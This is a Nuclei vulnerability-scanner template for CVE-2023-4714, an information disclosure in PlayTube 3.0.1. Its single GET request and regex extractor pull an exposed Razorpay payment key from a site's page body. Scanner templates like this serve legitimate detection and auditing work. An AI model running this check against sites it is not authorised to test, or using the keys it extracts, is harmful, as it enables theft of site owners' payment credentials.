nuclei-templates/http/cves/2023/CVE-2023-4714.yaml

52 lines
1.3 KiB
YAML

id: CVE-2023-4714
info:
name: PlayTube 3.0.1 - Information Disclosure
author: Farish
severity: high
description: |
A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4714
- https://www.exploitalert.com/view-details.html?id=39826
- https://vuldb.com/?ctiid.238577
- https://vuldb.com/?id.238577
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-4714
cwe-id: CWE-200
epss-score: 0.02146
epss-percentile: 0.88018
cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: playtube
product: playtube
tags: cve,cve2023,playtube,exposure
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "razorpay_options"
- "PlayTube"
- "key:"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'key: "([a-z_A-Z0-9]+)"'